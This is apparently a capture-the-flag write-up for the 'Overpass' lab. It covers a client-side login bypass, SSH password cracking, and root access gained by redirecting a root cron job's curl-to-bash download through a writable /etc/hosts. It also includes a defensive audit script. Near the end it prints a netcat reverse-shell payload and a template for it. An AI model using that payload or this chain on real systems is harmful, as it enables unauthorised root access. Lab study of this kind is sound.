Overpass

Port Scan

Directory Scan

Web Exploitation

  • After seeing all the directories, /admin was the most interesting to me

  • Looking at the source code I found some interesting .js files

  • login.js

  • This piece of code has a vulnerability: the client-side script checks the login response and, unless the response says incorrect credentials, it redirects us to the /admin page

Get admin privilege

  • Intercept the login request with Burp Suite and change the response to reach the admin panel

  • Right-click on the request > Do intercept > Response to this request

  • This is the response we get

  • Updated response

  • Admin homepage

User Shell

  • We got a username from the admin panel; I used John to crack the SSH password

  • We successfully got a shell

Root shell

  • I used a Python HTTP server to get linpeas onto the machine

  • We have permission to write to /etc/hosts

  • There's a cron job running as root which basically uses curl and pipes the result into bash

  • We are going to change the content of /etc/hosts, adding our IP as overpass.thm
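The two conditions chained here (a world-writable /etc/hosts and a root cron job that pipes a download into bash) are exactly what a host audit should flag before anyone reaches this step. The following is an added example written for this writeup, not a tool from the room; it runs on constructed crontab and /etc/hosts content and a constructed file mode rather than reading the real files, and the sample cron line reuses the overpass.thm name and buildscript.sh path mentioned above.

```javascript
// Added example: audit helpers for the misconfiguration this writeup chains.
// All inputs below are constructed; nothing is read from the live system.

const SAMPLE_CRONTAB = `
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
0 3 * * * root /usr/local/bin/backup.sh
`;
const SAMPLE_HOSTS = `127.0.0.1 localhost
127.0.1.1 overpass-prod
192.168.56.20 overpass.thm   # constructed mapping
`;
// st_mode as fs.statSync("/etc/hosts").mode would report for -rw-rw-rw- (constructed)
const SAMPLE_HOSTS_MODE = 0o100666;

// Parse system crontab lines (five schedule fields, a user, then the command).
function parseSystemCrontab(text) {
  const entries = [];
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#")) continue;
    const parts = line.split(/\s+/);
    if (parts.length < 7) continue;
    entries.push({
      schedule: parts.slice(0, 5).join(" "),
      user: parts[5],
      command: parts.slice(6).join(" "),
    });
  }
  return entries;
}

// A job that downloads something and hands it straight to a shell executes
// whatever the name in the URL currently resolves to.
const FETCH = /\b(?:curl|wget)\b/;
const PIPE_TO_SHELL = /\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b/;
function isPipeToShell(command) {
  return FETCH.test(command) && PIPE_TO_SHELL.test(command);
}

// Extract dotted host names from a command, skipping path components.
function hostnamesIn(command) {
  const names = new Set();
  const re = /(?<![\/.\w-])(?:https?:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  let m;
  while ((m = re.exec(command)) !== null) names.add(m[1].toLowerCase());
  return [...names];
}

// Map every name in an /etc/hosts text to its address, ignoring comments.
function hostsEntries(text) {
  const map = new Map();
  for (const raw of text.split("\n")) {
    const line = raw.split("#")[0].trim();
    if (!line) continue;
    const [addr, ...names] = line.split(/\s+/);
    for (const n of names) map.set(n.toLowerCase(), addr);
  }
  return map;
}

// The "other" write bit (o+w) is what lets any local account edit the file.
function isWorldWritable(mode) {
  return (mode & 0o002) !== 0;
}

// Combine the checks: report the writable file, every pipe-to-shell job, and
// every such job whose download host is resolved through that writable file.
function audit({ crontab, hostsText, hostsMode }) {
  const findings = [];
  const writable = isWorldWritable(hostsMode);
  if (writable) findings.push("/etc/hosts is world-writable");
  const hosts = hostsEntries(hostsText);
  for (const job of parseSystemCrontab(crontab)) {
    if (!isPipeToShell(job.command)) continue;
    findings.push(`cron job as ${job.user} pipes a download into a shell: ${job.command}`);
    for (const name of hostnamesIn(job.command)) {
      if (writable && hosts.has(name)) {
        findings.push(`${name} is resolved by the writable /etc/hosts (${hosts.get(name)}); root will run whatever that address serves`);
      }
    }
  }
  return findings;
}
```

On a real host you would feed audit() the output of fs.readFileSync on /etc/crontab and /etc/hosts plus fs.statSync("/etc/hosts").mode; the fix on the defensive side is the same either way: /etc/hosts owned by root with mode 644, and no root cron job that executes remote content without verifying it.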

  • First, create the files on your local machine

  • Add a payload in buildscript.sh

└─$ cat downloads/src/buildscript.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.250 4444 >/tmp/f
  • Add your IP and port [ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]

  • Start a python3 server

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.120.231 - - [02/Feb/2022 18:17:05] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
  • Start a netcat listener

  • Wait around 1 minute to get a root shell